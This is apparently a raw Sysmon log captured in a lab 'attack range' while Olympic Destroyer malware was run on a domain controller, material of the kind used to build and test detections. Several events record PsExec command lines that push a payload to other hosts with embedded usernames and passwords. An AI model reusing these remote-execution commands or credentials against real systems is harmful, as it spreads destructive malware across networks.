10:57:05.998{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292349Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:05.998{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292348Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:05.998{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292347Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:05.998{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292346Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:05.983{C8EA50B7-1301-6216-0406-000000003802}52286616C:\Windows\system32\conhost.exe{C8EA50B7-1301-6216-0106-000000003802}6744C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292345Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:05.967{C8EA50B7-F11F-6215-1000-000000003802}3641580C:\Windows\system32\svchost.exe{C8EA50B7-1301-6216-0306-000000003802}6576C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292344Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:05.967{C8EA50B7-F11F-6215-1000-000000003802}3641376C:\Windows\system32\svchost.exe{C8EA50B7-1301-6216-0306-000000003802}6576C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292343Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:05.951{C8EA50B7-1301-6216-0306-000000003802}65764820C:\Windows\system32\conhost.exe{C8EA50B7-1301-6216-FF05-000000003802}4252C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292342Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:05.951{C8EA50B7-F2AA-6215-B100-000000003802}22444896C:\Windows\system32\csrss.exe{00000000-0000-0000-0000-000000000000}5228C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000292341Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:05.951{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{00000000-0000-0000-0000-000000000000}5228C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000292340Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:03.589{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local54070- 354300x8000000000000000292339Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:03.542{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53684-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x8000000000000000292338Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:03.241{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53681-true0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local389ldap 354300x8000000000000000292337Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:03.241{C8EA50B7-F130-6215-2C00-000000003802}2420C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53681-true0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local389ldap 10341000x8000000000000000292336Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:05.920{C8EA50B7-F2AA-6215-B100-000000003802}22443360C:\Windows\system32\csrss.exe{00000000-0000-0000-0000-000000000000}6576C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000292335Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:05.920{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{00000000-0000-0000-0000-000000000000}6576C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292334Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:05.898{C8EA50B7-F2AA-6215-B100-000000003802}22444896C:\Windows\system32\csrss.exe{C8EA50B7-1301-6216-0206-000000003802}6544C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000292333Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:05.898{C8EA50B7-12E6-6216-4B05-000000003802}67926936C:\Temp\olympic_destroyer.exe{C8EA50B7-1301-6216-0206-000000003802}6544C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9278(wow64)|C:\Windows\System32\KERNELBASE.dll+15a0bb(wow64)|C:\Windows\System32\KERNELBASE.dll+159d6c(wow64)|C:\Temp\olympic_destroyer.exe+469a|C:\Temp\olympic_destroyer.exe+47ec|C:\Temp\olympic_destroyer.exe+4a2f|C:\Temp\olympic_destroyer.exe+5ac1|C:\Temp\olympic_destroyer.exe+84b3|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 154100x8000000000000000292332Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:05.905{C8EA50B7-1301-6216-0206-000000003802}6544C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe2.2Execute processes remotelySysinternals PsExecSysinternals - www.sysinternals.compsexec.cC:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe \\224.0.0.252 -u "RUVOZ990FILSRV\MICROSOFT$DPM$Acct" -p "1qay2wsx_!NSN2" -accepteula -d -s -c -f "C:\Users\ADMINI~1\AppData\Local\Temp\_pwv.exe"C:\Temp\ATTACKRANGE\Administrator{C8EA50B7-F2AC-6215-B31E-0B0000000000}0xb1eb32HighMD5=27304B246C7D5B4E149124D5F93C5B01,SHA256=3337E3875B05E0BFBA69AB926532E3F179E8CFBF162EBB60CE58A0281437A7EF,IMPHASH=C1E59519B5E5D84AF07AFA6F5A8625F1{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe"C:\Temp\olympic_destroyer.exe" 10341000x8000000000000000292331Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:05.898{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-1301-6216-0206-000000003802}6544C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 534500x8000000000000000292330Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:05.898{C8EA50B7-1301-6216-FC05-000000003802}5112C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe 10341000x8000000000000000292329Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:05.883{C8EA50B7-F11D-6215-0B00-000000003802}6281356C:\Windows\system32\lsass.exe{C8EA50B7-1301-6216-FC05-000000003802}5112C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\lsasrv.dll+26327|C:\Windows\system32\lsasrv.dll+2746d|C:\Windows\system32\lsasrv.dll+261a5|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292328Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:05.883{C8EA50B7-F11D-6215-0B00-000000003802}6281356C:\Windows\system32\lsass.exe{C8EA50B7-1301-6216-FC05-000000003802}5112C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2be8f|C:\Windows\system32\lsasrv.dll+260ed|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x8000000000000000292327Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localAlert,Sysinternals Tool UsedSetValue2022-02-23 10:57:05.867{C8EA50B7-1301-6216-FC05-000000003802}5112C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exeHKU\S-1-5-21-1032146228-2128790581-2941542908-500\SOFTWARE\Sysinternals\PsExec\EulaAcceptedDWORD (0x00000001) 10341000x8000000000000000292326Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:05.836{C8EA50B7-F11F-6215-1000-000000003802}3641580C:\Windows\system32\svchost.exe{C8EA50B7-1301-6216-0006-000000003802}6596C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292325Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:05.820{C8EA50B7-F11F-6215-1000-000000003802}3641376C:\Windows\system32\svchost.exe{C8EA50B7-1301-6216-0006-000000003802}6596C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292324Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:05.820{C8EA50B7-1301-6216-0006-000000003802}65965628C:\Windows\system32\conhost.exe{C8EA50B7-1301-6216-FC05-000000003802}5112C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292323Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:05.816{C8EA50B7-F2AA-6215-B100-000000003802}22444896C:\Windows\system32\csrss.exe{C8EA50B7-1301-6216-0106-000000003802}6744C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 23542300x8000000000000000292322Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:05.799{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FCAF6F727F11645B51C5F724B30C429E,SHA256=4C74D939D0CC19A17844443E3E79E86C5DC62CEB1C6279C89FECD0E5B91FD1BA,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000292321Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:05.799{C8EA50B7-12E6-6216-4B05-000000003802}67926924C:\Temp\olympic_destroyer.exe{C8EA50B7-1301-6216-0106-000000003802}6744C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9278(wow64)|C:\Windows\System32\KERNELBASE.dll+15a0bb(wow64)|C:\Windows\System32\KERNELBASE.dll+159d6c(wow64)|C:\Temp\olympic_destroyer.exe+469a|C:\Temp\olympic_destroyer.exe+47ec|C:\Temp\olympic_destroyer.exe+4a2f|C:\Temp\olympic_destroyer.exe+5ac1|C:\Temp\olympic_destroyer.exe+84b3|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 154100x8000000000000000292320Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:05.808{C8EA50B7-1301-6216-0106-000000003802}6744C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe2.2Execute processes remotelySysinternals PsExecSysinternals - www.sysinternals.compsexec.cC:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe \\239.255.255.250 -u "WW930\a593309" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\ADMINI~1\AppData\Local\Temp\_pwv.exe"C:\Temp\ATTACKRANGE\Administrator{C8EA50B7-F2AC-6215-B31E-0B0000000000}0xb1eb32HighMD5=27304B246C7D5B4E149124D5F93C5B01,SHA256=3337E3875B05E0BFBA69AB926532E3F179E8CFBF162EBB60CE58A0281437A7EF,IMPHASH=C1E59519B5E5D84AF07AFA6F5A8625F1{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe"C:\Temp\olympic_destroyer.exe" 10341000x8000000000000000292319Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:05.799{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-1301-6216-0106-000000003802}6744C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292318Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:05.799{C8EA50B7-F2AA-6215-B100-000000003802}22442592C:\Windows\system32\csrss.exe{C8EA50B7-1301-6216-FF05-000000003802}4252C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000292317Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:05.799{C8EA50B7-F2AA-6215-B100-000000003802}22444896C:\Windows\system32\csrss.exe{C8EA50B7-1301-6216-0006-000000003802}6596C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 534500x8000000000000000292316Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:05.799{C8EA50B7-1301-6216-FB05-000000003802}596C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe 10341000x8000000000000000292315Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:05.783{C8EA50B7-12E6-6216-4B05-000000003802}67926964C:\Temp\olympic_destroyer.exe{C8EA50B7-1301-6216-FF05-000000003802}4252C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9278(wow64)|C:\Windows\System32\KERNELBASE.dll+15a0bb(wow64)|C:\Windows\System32\KERNELBASE.dll+159d6c(wow64)|C:\Temp\olympic_destroyer.exe+469a|C:\Temp\olympic_destroyer.exe+47ec|C:\Temp\olympic_destroyer.exe+4985|C:\Temp\olympic_destroyer.exe+5ac1|C:\Temp\olympic_destroyer.exe+84b3|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 154100x8000000000000000292314Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:05.796{C8EA50B7-1301-6216-FF05-000000003802}4252C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe2.2Execute processes remotelySysinternals PsExecSysinternals - www.sysinternals.compsexec.cC:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe \\igmp.mcast.net -u "VULT\r.vult" -p "LottaVirus2019" -accepteula -d -s -c -f "C:\Users\ADMINI~1\AppData\Local\Temp\_pwv.exe"C:\Temp\ATTACKRANGE\Administrator{C8EA50B7-F2AC-6215-B31E-0B0000000000}0xb1eb32HighMD5=27304B246C7D5B4E149124D5F93C5B01,SHA256=3337E3875B05E0BFBA69AB926532E3F179E8CFBF162EBB60CE58A0281437A7EF,IMPHASH=C1E59519B5E5D84AF07AFA6F5A8625F1{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe"C:\Temp\olympic_destroyer.exe" 23542300x8000000000000000292434Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:07.834{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6A6DA514D92E2BFD2307DAA95AF52D00,SHA256=9964D870EBF9D14CD859EE3287C7B8E0E6EC0F8B7D4A28EE02A9C408765613D4,IMPHASH=00000000000000000000000000000000falsetrue 